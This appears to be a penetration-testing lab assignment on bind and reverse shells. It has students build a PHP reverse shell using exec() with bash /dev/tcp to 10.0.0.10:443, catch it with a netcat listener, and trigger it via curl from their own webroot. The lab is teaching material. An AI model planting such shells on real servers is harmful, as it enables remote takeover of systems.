http://localhost/shell.php

cyber security

A shell allows a user to interact with an operating system. Command line interfaces are examples of shells. A bind shell is a remote shell that has a listening port on the machine being attacked. Bind shells accept inbound connections and allow remote users to interact with the operating system. You have used SSH, which is an example of a bind shell. A reverse shell also allows a remote user to interact with the operating system, but instead of accepting inbound connections from the remote user to the local machine (bind shell), the remote user opens a listening port and the local machine initiates the connection to the remote user. Many penetration testing scenarios expect the penetration tester to gain a shell on compromised machines, and due to networking contstraints and security controls, the reverse shell is often the best choice for obtaining a shell. There are many, many different types of reverse and bind shells. The shell that will work in any given situation depends on: - the operating system of machine be attacked - applications and tools installed on the machine being attacked - network, firewall or anti-virus software installation and configuration Prepare your GCP instance Install netcat. sudo apt update sudo apt install netcat-openbsd PHP Reverse Shell Some vulnerabilities or misconfigurations may allow a remote attacker to upload an arbitrary file and execute server-side scripts through a web service such as Apache2 or nginx. PHP is the most popular server-side scripting language on the Internet. Over 80% of websites run on PHP, so it is worthwhile to practice PHP oriented exploits. The core of most PHP exploits rely on one of three functions: system(), exec(), and passthru(). System() is the preferred function when the attacker needs the results returned. System() executes a command and returns the result. Exec() executes the command but does not return the result. Passthru() is similar to system() but is intended to return raw data, such as binary. A payload that attacks an RCE vulnerability might be designed to return the results of a command execution to the attacker through an HTTP response. However, a payload that is intended to simply execute a command that results in some clever action, like a reverse shell, and you really do not need the results of that command, then exec() is the preferred method(). Of course, the attacker does not always get what they want, so if you want to use exec() but it does not work, it is worth a shot to try system() or even passthru(). You get the idea. For the purpose of this exercise, we are not interested in the response, so we will try exec(). Create a file, shell.php, on your GCP instance with the following PHP script. Obviously, you should update the IP address to catch the shell on your GCP instance. You might note that the following shell is the same bash shell you played with earlier, but that bash shell is being executed by php script using the exec() function. \&/dev/tcp/10.0.0.10/443 0>\&1'") ; ?> Next, install Apache2 and PHP on your GCP instance. sudo apt install apache2 php libapache2-mod-php php -v *Note the PHP version. Assuming the PHP version is 7.4.3, run the following command. If not version 7.4.3, update the command with the correct version. In this example, use a2enmod php7.4 not a2enmod php7.4.3 sudo a2enmod php7.4 sudo systemctl restart apache2 Okay, now Apache2 and PHP are installed and should be enabled. Let's take our PHP shell for a test spin. Start your listener and execute the reverse shell by command line. The following example assumes the listening port (Iport) is 443: Start listener in terminal 1: sudo nc -nvlp 443 Execute the shell in terminal 2: php shell.php Capture a screenshot with the results of the commands id, hostname and pwd. Now you know you have a working PHP shell and that PHP works on your instance. That's great, but kind of the whole point that makes PHP interesting, at least to penetration testers, is that we can execute a PHP reverse shell with a browser ... if we can upload the script to some resource that can be reached with a browser. That browser could be Chrome, Firefox, Safari, or even a simple CLI browser like CuRL. In this next step we will post shell.php to our GCP's webroot (/var/uww/html) then use CuRL to trigger the shell. 1. Copy shell.php to /var/www/html/ 2. Verify that apache 2 is running and start apache 2 if needed 3. Start your listener and trigger the shell with curl 4. Capture a screenshot with the results of the commands id, hostname and pwd. Submission: Submit the screenshots from the two PHP reverse shells